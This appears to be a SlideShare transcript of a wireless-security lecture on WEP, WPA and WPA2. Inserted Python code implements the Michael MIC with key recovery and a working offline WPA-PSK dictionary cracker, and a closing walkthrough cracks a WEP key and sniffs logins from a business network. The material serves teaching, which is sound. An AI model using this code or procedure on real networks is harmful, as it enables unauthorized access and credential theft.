Wireless security presentationMuhammad Zia
 

Viewers also liked (9)

Netstumbler, vistumbler, wifi inspector
Netstumbler, vistumbler, wifi inspectorNetstumbler, vistumbler, wifi inspector
Netstumbler, vistumbler, wifi inspector
 
Kismet
KismetKismet
Kismet
 
Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]
 
The magic of ettercap
The magic of ettercapThe magic of ettercap
The magic of ettercap
 
Ettercap
EttercapEttercap
Ettercap
 
Ch 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksCh 11: Hacking Wireless Networks
Ch 11: Hacking Wireless Networks
 
Wardriving
WardrivingWardriving
Wardriving
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 
Sniffing via dsniff
Sniffing via dsniffSniffing via dsniff
Sniffing via dsniff
 

Similar to Wireless security837

5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_kRama Krishna M
 
Wireless network security
Wireless network securityWireless network security
Wireless network securityVishal Agarwal
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
4 wifi security
4 wifi security4 wifi security
4 wifi securityal-sari7
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonOWASP Delhi
 
Wireless hacking and security
Wireless hacking and securityWireless hacking and security
Wireless hacking and securityAdel Zalok
 
Wireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by VijayWireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by Vijaythevijayps
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxAmanuelZewdie4
 
DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting Shah Sheikh
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSreekanth GS
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11bguestd7b627
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008ClubHack
 
wireless lan security.ppt
wireless lan security.pptwireless lan security.ppt
wireless lan security.pptSagarBedarkar3
 
New flaws in WPA-TKIP
New flaws in WPA-TKIPNew flaws in WPA-TKIP
New flaws in WPA-TKIPvanhoefm
 
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...IDES Editor
 

Similar to Wireless security837 (20)

Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_k
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
4 wifi security
4 wifi security4 wifi security
4 wifi security
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh Jadon
 
WEP
WEPWEP
WEP
 
Wireless hacking and security
Wireless hacking and securityWireless hacking and security
Wireless hacking and security
 
Wireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by VijayWireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by Vijay
 
Wi fi security
Wi fi securityWi fi security
Wi fi security
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptx
 
DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11b
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11b
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008
 
wireless lan security.ppt
wireless lan security.pptwireless lan security.ppt
wireless lan security.ppt
 
New flaws in WPA-TKIP
New flaws in WPA-TKIPNew flaws in WPA-TKIP
New flaws in WPA-TKIP
 
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
 

More from mark scott

Network troubleshooting-guide1889
Network troubleshooting-guide1889Network troubleshooting-guide1889
Network troubleshooting-guide1889mark scott
 
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380mark scott
 
6218i2 wireless-router-users-guide2453
6218i2 wireless-router-users-guide24536218i2 wireless-router-users-guide2453
6218i2 wireless-router-users-guide2453mark scott
 
Wireless lab4902
Wireless lab4902Wireless lab4902
Wireless lab4902mark scott
 
Sip 140208055023-phpapp02
Sip 140208055023-phpapp02Sip 140208055023-phpapp02
Sip 140208055023-phpapp02mark scott
 
My freeware-shareware-programs2205
My freeware-shareware-programs2205My freeware-shareware-programs2205
My freeware-shareware-programs2205mark scott
 

More from mark scott (8)

Network troubleshooting-guide1889
Network troubleshooting-guide1889Network troubleshooting-guide1889
Network troubleshooting-guide1889
 
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
 
6218i2 wireless-router-users-guide2453
6218i2 wireless-router-users-guide24536218i2 wireless-router-users-guide2453
6218i2 wireless-router-users-guide2453
 
Wireless lab4902
Wireless lab4902Wireless lab4902
Wireless lab4902
 
Etherfast3828
Etherfast3828Etherfast3828
Etherfast3828
 
Sip 140208055023-phpapp02
Sip 140208055023-phpapp02Sip 140208055023-phpapp02
Sip 140208055023-phpapp02
 
My freeware-shareware-programs2205
My freeware-shareware-programs2205My freeware-shareware-programs2205
My freeware-shareware-programs2205
 
S000342 t
S000342 tS000342 t
S000342 t
 

Wireless security837

  • 1. Wireless Security 802.11 With a focus on Security by Brian Lee Takehiro Takahashi
  • 2. Survey (1)  Who has not used wireless?  Are you confident with your wireless network?
  • 3. Brief Overview  Wireless Technology Overview  Architecture  Features  Wireless Security Overview  Built-in security features in 802.11  WEP insecurity  802.1x  WPA  WPA2 - 802.11i
  • 4. GOAL  Understand the state of art  WEP is insecure  But we CAN make a wireless network ‘secure’
  • 5. 802.11Basics  Infrastructure Mode or Ad Hoc  11Mbps with 802.11b  feels slow….? (effective speed ~ 50%)  802.11 a/b/g/n : Physical Layer Spec  802.11i : Security Spec  802.11r : QoS
  • 6. 802.11 Built-in Features  802.11 frame types  Association Request/Response Frame  Beacon Frame  RTS/CTS Frame  Shared/Open Authentication  WEP (Layer 2 security)  Integrity  Confidentiality
  • 7. SSID  Network identifier  SSID is broadcasted in a beacon frame  Clear Text!  Change it from the default  Cisco = tsunami  Linksys = linksys  Netgear = netgear  Stop broadcasting!
  • 8. MAC Address Filtering  White-list approach  Does not scale  Frame headers are never encrypted  Sniffing traffic will reveal valid MAC addresses  Bottom line…..  Prevents casual hacking..  Quite useless
  • 9. Shared/Open Authentication (1)  2 ways of initiating communication  Shared Key  Open Key authentication  Open key Auth = No authentication  Shared Key Auth = requires WEP
  • 10. Shared Authentication (2)  The challenge is generated using a PRNG used by WEP  Challenge is then encrypted using WEP key and sent back  This is bad…….. reveals the WEP key
  • 11. WEP (Wired Equivalent Protocol)  Provides “Confidentiality”, and “Integrity”.  Uses 40/104 bits RC4 encryption + CRC32
  • 13. 64/40 and 128/104 bits confusion  IV (24bits)  Your WEP key:  5-ASCII char word = 40bits  13-ASCII char word = 104bits Security-wise, it’s really 40bits or 104bits
  • 14. Problems with WEP  1 Static Key  No encryption is strong if one key is used forever  Key length is short (40bits)  Brute forcing is possible  104bits version exists  Using CRC32  CRC is a hash function used to produce a checksum  Improper use of RC4  IV space is too small (24bits)  No protection against replay attack  No specification on key distribution  Lacks scalability
  • 15. CRC32 and WEP  CRC32 doesn’t have the cryptographic strength seen in MD5 or SHA1  Bit-flipping is possible  Change the data, and WEP won’t catch it Seems trivial….?
  • 16. RC4 and WEP (1)  RC4 – Rivest’s Cipher 4  Stream Cipher  What is a requirement for a stream cipher?  Avoid key sequence collision at any cost  {M1 XOR RC4-Key} XOR {M2 XOR RC4-Key} = M1 XOR M2  With WEP, key sequences are repeated every 16 million packets (2 ^ 24) Key sequence collision doesn’t reveal the WEP key!
  • 17. RC4 and WEP (2)  Weak IVs reveal the WEP key  5% chance of guessing the portion of the seed (WEP key) correctly  FMS attack  2M~ packets to decrypt 40bit WEP key  The time needed is a linear function to the key length  104bit key is just as useless as 40bits key
  • 18. Replay Attacks  Reinjection of the captured packets are possible  IV usage is not specified
  • 19. Effective WEP cracking  KoreK attack (Aug. 2004)  Another statistical analysis based attack on WEP key  Extremely fast  Decrypts packets using CRC32 vulnerability  Possible with as little as 0.1M IVs (packets)…  Traditional method requires more than 2M packets  Accelerate it with packet injection – ARP A 40-bit WEP can be cracked in 10 Minutes Fast swapping of WEP key is no longer safe
  • 20. Conclusion: WEP  Confidentiality  FMS attack  KoreK attack  Integrity  Bit-flipping attack  Authentication  Non-existent  Attacks can be completely passive NO MORE WEP
  • 21. WEP…. Wired Equivalent Privacy Well.. More like What on the Earth does it Protect?
  • 22. Finally…. we have solutions!  802.1x (Authentication)  per-user authentication  Key distribution mechanism  WPA (Confidentiality, Integrity)  Subset of 802.11i  2 forms  802.1x Auth + TKIP (Enterprise mode)  Pre-shared Key + TKIP  WPA2 – 802.11i  WPA2 is the implementation of 802.11i  Uses AES-CCMP
  • 23. 802.1x (Authentication) WPA WPA2 (802.11i)
  • 24. 802.1X  802.1X is a port-based, layer 2 authentication framework  Not limited wireless networks  Uses EAP for implementation  End-result  A WEP key for WEP  A seed for an encryption key used in WPA/WPA2 802.1X is not an alternative to WEP
  • 26. Extensible Authentication Protocol (EAP)  Authentication Framework  runs on the different layer than 802.1x  Very flexible  RADIUS is de-facto  a server for remote user authentication and accounting
  • 27. Implementations  EAP methods adopted in WPA/WPA2  EAP-MD5  EAP-LEAP  EAP-TLS  EAP-TTLS  PEAP
  • 28. EAP-MD5  EAP-MD5 is a simple EAP implementation  Uses and MD5 hash of a username and password that is sent to the RADIUS server  Authenticates only one way  Man in the middle attack  Bottom line: Not recommended
  • 29. LEAP (EAP-Cisco)  Like EAP-MD5, it uses a Login/Password scheme that it sends to the RADIUS server  Each user gets a dynamically generated one time key upon login  Authenticates client to AP and vice versa  Only guaranteed to work with Cisco wireless clients  Broken – ASLEAP by Joshua Wright  Dictionary attack
  • 30. EAP-TLS by Microsoft  Instead of a username/password scheme, EAP-TLS uses certificate based authentication  Two way authentication  Uses TLS (Transport Layer Security) to pass the PKI (Public Key Infrastructure) information to RADIUS server  Compatible with many OS’s  Harder to implement and deploy because PKI for clients are also required
  • 31. PEAP by Microsoft and Cisco  A more elegant solution!  Very similar to EAP-TLS except that the client does not have to authenticate itself with the server using a certificate, instead it can use a login/password based scheme  Much easier to setup, does not necessarily require a PKI  Currently works natively with Windows XP SP1, and OSX. 802.1x supplicant exists for linux
  • 32. WPA (Wi-Fi Protected Access)  Subset of 802.11i  Confidentiality  Fix flawed encryption mechanism  TKIP: Per-packet dynamic key mechanism  Integrity  Upgradeability  Software / Firmware Upgrade
  • 33. WPA Mechanism 1. Confirmation of association capability 2. Authentication by 802.1x or PSK 3. 4-way handshake 4. Encryption using TKIP Very Different from WEP which took care of “everything”
  • 35. 4 Way Handshake and PTK
• 36. 802.1x Authentication + PMK  Security level can be selected through the EAP method chosen  Pairwise Master Key (PMK) is the seed for the temporal keys used in encryption  PMK is generated from the result of user authentication: with 802.1X the EAP method derives it and RADIUS delivers it to the AP; with PSK the pre-shared key itself is the PMK
• 37. 4 Way Handshake and PTK  PTK (512 bits for TKIP) is split four ways: KCK (128 bits, MICs the handshake messages themselves), KEK (128 bits, wraps the group key in message 3), TK (128 bits, the temporal key) and two 64-bit Michael MIC keys  The TK is what feeds per-packet key mixing (the WEP-equivalent key) in the next phase
  • 38. 4 Way Handshake and PTK
• 39. TKIP (Temporal Key Integrity Protocol)  The heart of the WPA encryption mechanism  Expands IV space (24 → 48 bits)  IV sequence is enforced: the 48-bit TSC must increase, so replayed frames are dropped  Two-phase key mixing turns TK, transmitter MAC and TSC into a per-packet 128-bit RC4 key that WEP hardware can use; the expensive phase 1 is recomputed only every 2^16 packets  Michael  Very cheap integrity checker: a 64-bit keyed MIC over DA, SA, priority and data
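Michael, as an added example that is not code from the slides: a Python implementation of the TKIP MIC, checked against the first test vector of the standard (all-zero key, empty message gives 82925c1ca1d130b8), plus the property that makes "very cheap" a double-edged description. The block function is invertible, so one known MSDU and its MIC give back the 64-bit MIC key. The DA/SA/payload and key in the demo are constructed values.

```python
MASK = 0xFFFFFFFF


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _ror(x: int, n: int) -> int:
    return ((x >> n) | (x << (32 - n))) & MASK


def _xswap(x: int) -> int:
    # Swap the two bytes of each 16-bit half.
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def _block(l: int, r: int):
    """Michael block function b(l, r): four rotate/xor/add rounds on 32-bit words."""
    r ^= _rol(l, 17); l = (l + r) & MASK
    r ^= _xswap(l);   l = (l + r) & MASK
    r ^= _rol(l, 3);  l = (l + r) & MASK
    r ^= _ror(l, 2);  l = (l + r) & MASK
    return l, r


def _block_inv(l: int, r: int):
    """Exact inverse of _block: undo the rounds in reverse order."""
    l = (l - r) & MASK; r ^= _ror(l, 2)
    l = (l - r) & MASK; r ^= _rol(l, 3)
    l = (l - r) & MASK; r ^= _xswap(l)
    l = (l - r) & MASK; r ^= _rol(l, 17)
    return l, r


def _words(msg: bytes):
    """Michael padding: one 0x5a byte, then 4 to 7 zero bytes up to a multiple of 4; little-endian words."""
    padded = msg + b"\x5a" + bytes(4)
    padded += bytes((-len(padded)) % 4)
    return [int.from_bytes(padded[i:i + 4], "little") for i in range(0, len(padded), 4)]


def michael(key: bytes, msg: bytes) -> bytes:
    """64-bit Michael MIC of msg under a 64-bit key (K0 || K1, little-endian)."""
    l = int.from_bytes(key[0:4], "little")
    r = int.from_bytes(key[4:8], "little")
    for w in _words(msg):
        l ^= w
        l, r = _block(l, r)
    return l.to_bytes(4, "little") + r.to_bytes(4, "little")


def tkip_msdu_mic(key: bytes, da: bytes, sa: bytes, priority: int, msdu: bytes) -> bytes:
    """TKIP feeds DA || SA || priority || 0x000000 || MSDU to Michael, so the addresses are covered too."""
    return michael(key, da + sa + bytes([priority, 0, 0, 0]) + msdu)


def michael_recover_key(msg: bytes, mic: bytes) -> bytes:
    """Run the block function backwards from a known (message, MIC) pair: recovers the MIC key."""
    l = int.from_bytes(mic[0:4], "little")
    r = int.from_bytes(mic[4:8], "little")
    for w in reversed(_words(msg)):
        l, r = _block_inv(l, r)
        l ^= w
    return l.to_bytes(4, "little") + r.to_bytes(4, "little")


# Constructed demo values (not from any capture).
DEMO_KEY = bytes.fromhex("d55e100510128986")
DEMO_DA = bytes.fromhex("000c41aabbcc")
DEMO_SA = bytes.fromhex("000e35112233")
DEMO_MSDU = b"GET / HTTP/1.0\r\n\r\n"


def demo_key_recovery() -> bool:
    """True if the MIC key comes back from a single (header, MSDU, MIC) triple."""
    mic = tkip_msdu_mic(DEMO_KEY, DEMO_DA, DEMO_SA, 0, DEMO_MSDU)
    covered = DEMO_DA + DEMO_SA + bytes([0, 0, 0, 0]) + DEMO_MSDU
    return michael_recover_key(covered, mic) == DEMO_KEY
```

Because a MIC key leaks this easily from one decrypted frame, TKIP never relies on Michael alone: the receiver also enforces the TSC order, and after two MIC failures within 60 seconds it shuts the link down for 60 seconds and forces a rekey, which is what keeps an attacker from simply guessing.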
• 40. WPA-PSK  For home / SOHO use  Removes 802.1X authentication  Pre-shared key (PMK = PBKDF2 of passphrase and SSID) + TKIP  Weak against an offline dictionary attack: a passively captured 4-way handshake is enough to test guesses, since the MACs and nonces are in the clear and the MIC on the handshake verifies each candidate  Attacks exist - WPA Cracker  Still MUCH better than WEP, provided the passphrase is long and random
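The WPA mechanism (slide 33), the 4-way handshake and PTK split (slides 36 and 37) and the WPA-PSK dictionary attack (slide 40) all come down to one key hierarchy, so here is one added example that walks through it in Python. It is not code from the slides or from WPA Cracker: it derives the PMK from a passphrase, expands it to the TKIP PTK with the 802.11i PRF, builds and MICs a message-2 EAPOL-Key frame, and then plays the attacker who has only the capture and a wordlist. The SSID, MAC addresses, nonces and passphrase are constructed values; the PBKDF2 check value in the test is the standard's own "password"/"IEEE" vector.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: the PMK is the PSK itself, PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce, nbytes=64):
    """Step 3 of the WPA mechanism: PTK = PRF-512(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def split_ptk(ptk: bytes) -> dict:
    """TKIP PTK layout: KCK | KEK | TK | Michael Tx key | Michael Rx key (128/128/128/64/64 bits)."""
    return {"KCK": ptk[0:16], "KEK": ptk[16:32], "TK": ptk[32:48],
            "MIC_TX": ptk[48:56], "MIC_RX": ptk[56:64]}


# EAPOL-Key field offsets within the frame.
NONCE_OFF = 17   # EAPOL header(4) + descriptor type(1) + key info(2) + key length(2) + replay counter(8)
MIC_OFF = 81     # NONCE_OFF + nonce(32) + key IV(16) + key RSC(8) + key ID(8)


def build_msg2(snonce: bytes, replay_counter: int = 0, key_data: bytes = b"") -> bytes:
    """Supplicant's message 2 with the MIC field zeroed. Key info 0x0109 = descriptor version 1
    (HMAC-MD5 MIC, as WPA/TKIP uses), pairwise key, MIC present."""
    body = bytes([254])                                   # descriptor type 254 = WPA (WPA2/RSN uses 2)
    body += (0x0109).to_bytes(2, "big")
    body += (32).to_bytes(2, "big")                       # key length: TKIP
    body += replay_counter.to_bytes(8, "big")
    body += snonce
    body += bytes(16) + bytes(8) + bytes(8)               # key IV, key RSC, key ID: unused in message 2
    body += bytes(16)                                     # MIC placeholder
    body += len(key_data).to_bytes(2, "big") + key_data   # the WPA IE would normally go here
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 = EAPOL-Key


def eapol_key_mic(kck: bytes, frame: bytes, version: int = 1) -> bytes:
    """MIC over the whole EAPOL frame with the MIC field zeroed: HMAC-MD5 for descriptor
    version 1 (TKIP), HMAC-SHA1 truncated to 128 bits for version 2 (CCMP)."""
    zeroed = frame[:MIC_OFF] + bytes(16) + frame[MIC_OFF + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def sign_msg2(kck: bytes, frame: bytes) -> bytes:
    return frame[:MIC_OFF] + eapol_key_mic(kck, frame) + frame[MIC_OFF + 16:]


def crack_psk(ssid, aa, spa, anonce, msg2, wordlist):
    """Offline dictionary attack on a captured handshake. Everything but the passphrase is in the
    capture (MACs and nonces travel in the clear); the MIC on message 2 checks each guess."""
    captured_mic = msg2[MIC_OFF:MIC_OFF + 16]
    snonce = msg2[NONCE_OFF:NONCE_OFF + 32]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = split_ptk(derive_ptk(pmk, aa, spa, anonce, snonce))["KCK"]
        if hmac.compare_digest(eapol_key_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed demo values (not from any real capture).
SSID = "home-wlan"
AA = bytes.fromhex("000c41aabbcc")     # AP (authenticator) MAC
SPA = bytes.fromhex("000e35112233")    # client (supplicant) MAC
ANONCE = hashlib.sha256(b"demo-anonce").digest()
SNONCE = hashlib.sha256(b"demo-snonce").digest()


def demo(passphrase: str = "tsunami2004", wordlist=None):
    """Run the handshake side, then attack it; returns the recovered passphrase or None."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = split_ptk(derive_ptk(pmk, AA, SPA, ANONCE, SNONCE))["KCK"]
    msg2 = sign_msg2(kck, build_msg2(SNONCE))
    if wordlist is None:
        wordlist = ["password", "linksys", "tsunami", "netgear", "tsunami2004"]
    return crack_psk(SSID, AA, SPA, ANONCE, msg2, wordlist)


if __name__ == "__main__":
    print(demo())
```

Each guess costs the 4096-round PBKDF2 (two SHA-1 output blocks, so 8192 HMAC-SHA1 calls) plus the PRF, which is what keeps the attack slow per candidate, but nothing rate-limits it because it never touches the network. With 802.1X the PMK comes out of the EAP exchange fresh for every session, so the same captured handshake gives an attacker nothing to guess at.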
• 41. WPA Security Insight  No effective attacks known against WPA + 802.1X with a sound EAP method  WPA-PSK should be used with care: its strength is exactly the strength of the passphrase
• 42. WPA2 - 802.11i  The long-awaited security standard for wireless, ratified in June 2004  Better encryption: AES-CCMP (AES in counter mode with a CBC-MAC, replacing both RC4 and Michael)  Key-caching (optional)  Pre-authentication (optional)  Hardware manufactured before 2002 is likely to be unsupported: it lacks the AES engine CCMP needs
• 43. PMK Key-Caching  Key-caching: AP and client keep the PMK from a completed 802.1X exchange, so returning to that AP skips re-entering credentials and the EAP round trip; only the 4-way handshake is redone  Pre-authentication: the client authenticates to a neighbouring AP through its current AP before moving to it  Useful in encrypted VoIP over Wi-Fi  Fast roaming
  • 44. Conclusion  WEP = Dead Meat  WPA-PSK = Potentially Insecure  WPA + 802.1x (Secure EAP) = Secure  WPA2-PSK = Potentially Insecure  WPA2 + 802.1x = Very Secure
• 45. Suggested Practice  Hide SSID (this keeps it out of beacons only; it still appears in probe and association frames, as step 3 of the exercise below shows)  Do NOT use WEP  Use WPA-PSK with a good pass-phrase (long and random, not a dictionary word)  or use WPA with 802.1X if possible  Get a WPA2 certified product for your next purchase
• 46. tinyPEAP (1)  A self-contained PEAP-enabled RADIUS server  Currently available in Linksys WRT54G/GS router firmware and as a Win32 binary  Native Windows XP SP1 support  Web-based user management  The easiest and most secure solution available at consumer level
  • 49. Survey (2)  Ready to reconfigure your wireless network?
  • 51. Links to the tools used:  Airsnort http://airsnort.shmoo.com  Netstumbler http://www.netstumbler.com  Ethereal http://www.ethereal.com  tinyPEAP http://www.tinypeap.com
  • 52. Papers and Wireless Security Web Pages  Weaknesses in the Key Scheduling Algorithm of RC4  The Unofficial 802.11 Security Web Page  Wireless Security Blackpaper  The IEEE 802.11 specifications (includes WEP spec)  Paper on detecting Netstumbler and similar programs  Further reading on upcoming 802.11 variations  Assorted 802.11 related crypto algorithms written in ANSI C
  • 53. An exercise in wireless insecurity  Tools used:  Laptop w/ 802.11a/b/g card  GPS  Netstumbler  Aircrack (or any WEP cracking tool)  Ethereal  the car of your choice
• 54. Step 1: Find networks to attack  An attacker would first use Netstumbler to drive around and map out active wireless networks  Using Netstumbler, the attacker locates a strong signal on the target WLAN  Netstumbler not only has the ability to monitor all active networks in the area, it also integrates with a GPS to map APs
• 56. Step 2: Choose the network to attack  At this point, the attacker has chosen his target; most likely a business  Netstumbler can tell you whether or not the network is encrypted  Also, start Ethereal to look for additional information. This time the target is GTwireless
• 57. Step 3: Analyzing the Network  WLAN does not broadcast its SSID  Netstumbler still tells me that the SSID is GTwireless (it travels in the clear in probe and association frames)  Multiple access points  Open authentication  WLAN is encrypted with 40-bit WEP  WLAN is not using 802.1X; access is gated by a web login instead
• 58. Step 4: Cracking the WEP key  Attacker puts the NIC driver into monitor mode  Begins capturing packets with Airodump  Airodump quickly lists the available networks with SSID and starts capturing packets  After a few hours of the airodump session, launch aircrack to start cracking!  WEP key for GTwireless is revealed!
• 59. Step 5: Sniffing the network  Once the WEP key is cracked and the NIC is configured with it, the attacker is assigned an IP address and can access the WLAN  However, a secure proxy with an SSL-enabled web-based login prevents access to the rest of the network and the Internet  Attacker begins listening to traffic with Ethereal
• 60. Step 6: Sniffing continued…  Sniffing a WLAN is very fruitful because everyone on the WLAN is a peer sharing the same key, so you can sniff every wireless client  Listening to connections over plain-text protocols (in this case FTP, POP, Telnet) to servers on the wired LAN yielded 2 usable logins within 1.5 hrs
• 61. What was accomplished?  Complete access to the WLAN  Complete access to the wired LAN  Complete access to the Internet  Access to servers on the wired LAN using the sniffed accounts  Some anonymity: active probing by Netstumbler and similar tools can be detected, so skip that step if possible
• 62. Other possibilities  Instead of sniffing a valid login, the attacker could have exploited a known vulnerability in the proxy (provided there is one)  Greater risk of being noticed, which an attacker does not want
• 63. That’s it…the network is compromised  As long as WEP is in place, such an attack is always possible  Sadly, many networks are less secure than this one  How about yours?